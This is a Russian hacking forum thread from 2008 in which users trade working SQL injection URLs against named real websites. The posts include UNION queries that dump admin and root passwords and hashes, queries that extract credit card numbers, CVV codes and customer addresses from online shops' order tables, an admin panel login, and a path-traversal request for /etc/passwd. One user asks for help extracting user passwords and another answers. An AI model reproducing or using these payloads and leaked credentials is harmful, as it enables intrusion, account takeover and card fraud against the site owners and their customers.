ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7041  
Старый 08.12.2008, 13:51
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Цитата:
Сообщение от SWAT  
facebook.com

Код:
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERSION(),2,3,4--
Version: 5.0.67-community
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,user name,2,3,password%20from%20users%20limit%201,1
Хмм.. это не сам facebook..
http://affinispace.com/facebook/
 
Ответить с цитированием

  #7042  
Старый 08.12.2008, 16:31
Аватар для USAkid
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

http://www.soulmenace.com


Код:
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,3,4,5,6,7--
Версия оказалась 4.0.27-standard и пришлось подбирать вручную.
Нашел таблицу prarez_soul.user, в ней подобрал имена: username и password. Вытащил логин с пассом:

Код:
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,concat_ws(username,0x3a,password),4,5,6,7+from+prarez_soul.user--
prarez : djbamix

вход:
Код:
http://www.soulmenace.com/login.php
 
Ответить с цитированием

  #7043  
Старый 08.12.2008, 18:49
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://printer.konicaminoltaeurope.com/be/fr/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user--&PHPSESSID=66fba6d0283e0b2c99df64e3249e6916
логин/пасс:
Код:
admin:6d8369a953851a24
Код:
root:6d8369a953851a24
--------------------------------------------------------
Код:
http://www.beethovenmusic.nl/news.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+user--
логин/пасс:
Код:
admin:nevets1
--------------------------------------------------------
The End!

Последний раз редактировалось -m0rgan-; 08.12.2008 в 19:04..
 
Ответить с цитированием

  #7044  
Старый 08.12.2008, 22:30
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.smeda.org/info.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18--
4.0.17-log - root@localhost - smeda_main01
pr - 5
тИЦ - 20
 
Ответить с цитированием

  #7045  
Старый 09.12.2008, 00:23
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.e-linebv.nl/news.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14,15,16+from+mysql.user--
логин/пасс:
Код:
root:05764bd379f12110
---------------------------------------------------------------
Код:
http://www.factorydirect.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,log,pass),3,4+from+login--
логин/пасс:
Код:
tyra:f@ctorydirect.nl
---------------------------------------------------------------
Код:
http://www.waterpoortboys.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,username,password),3,4+from+admins--
логин/пасс:
Код:
Alco:da77e9894373dc42c7d83650b5c3f9c2
---------------------------------------------------------------
The End!
 
Ответить с цитированием

Shop (есть картон...)
  #7046  
Старый 09.12.2008, 00:24
Аватар для FNS
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Shop (есть картон...)

Один шоп с картоном, второй не юзал основательно.
Цитата:
http://www.212dressingroom.com/purchasingguide.php?id=-1+union+select+1,concat_ws(0x3a3a,id,userid,orderd ate,shippingcharge,shippingmethoad,promocodeid,tot al,grandtotal,ccname,cctype,ccnumber,ccmonth,ccyea r,cvv,orderstatus,ispaid,fname,mname,lname,address 1,address2,city,state,country,zipcode,day_telephon e,evening_telephone,companyname,ship_fname,ship_mn ame,ship_lname,ship_address1,ship_address2,ship_ci ty,ship_state),3+from+ordermaster--
Цитата:
http://shop.genusdigital.com/content.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,ID,Billing Name,BillingHName,BillingAddress1,BillingAddress2, BillingCity,BillingPin,BillingCountry,BillingPhone ,BillingEmail,ShippingName,ShippingHName,ShippingA ddress1,ShippingAddress2,ShippingCity,ShippingPin, ShippingCountry,ShippingPhone,ShippingEmail,OrderD ate,ShippingCost,TransactionStatus,TransactionTota l,TransactionTimeStamp,TransactionChargeType,Trans actionECIStatus,TransactionCardPrefix,OrderSession ),6,7+from+orders--

Последний раз редактировалось FNS; 09.12.2008 в 08:00..
 
Ответить с цитированием

  #7047  
Старый 09.12.2008, 01:20
Аватар для Thrasher88
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

www.citymix.ru - интернет-магазин одежды
Цитата:
http://www.citymix.ru/info.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6/*
Version: 5.0.27-log
User: citymix@localhost
Database: citymix
 
Ответить с цитированием

  #7048  
Старый 09.12.2008, 02:32
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

"Аренда интернет магазина" (Не сайт, а одна сплошная дырка)

Код:
http://www.indsite.ru/index.php?object=magazin&id_content=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
2-ое поле принтабельно.
5-ая ветка.

Админка:

Код:
http://www.indsite.ru/im_index.php?file=input1.php
info41 : 1

Ну и:

Код:
http://www.indsite.ru/index.php?object=korzina&id0=36687&operation=../../../../../../../../etc/passwd
 
Ответить с цитированием

  #7049  
Старый 09.12.2008, 10:43
Аватар для Thrasher88
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Помогите, пожалуйста, вынуть логин и пасс юзеров.
Вот скуля:
Цитата:
http://gta.com.ua/file_details.phtml?id=-1'
Список полей в таблице mtl_users:
Цитата:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+information_schema. columns+where+table_name=0x6d746c5f7573657273--
Дальше пытаюсь вывести содержимое полей вот так:
Цитата:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(username,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+mtl_users--
Но ничего не выходит! Вылазит ошибка
Цитата:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gtacom/domains/gta.com.ua/public_html/inc/files_details.html on line 155
Что делать? Как просмотреть данные ролей? Пробовал шифровать название таблицы, колонок (на всякий случай), заменять плюсы на просто пробелы и на /**/ - все равно не выводится
 
Ответить с цитированием

  #7050  
Старый 09.12.2008, 11:23
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

И не удивительно, ведь таблица mtl_users - пустая.

Код:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(0x2f,table_name,table_rows),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+36,1--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ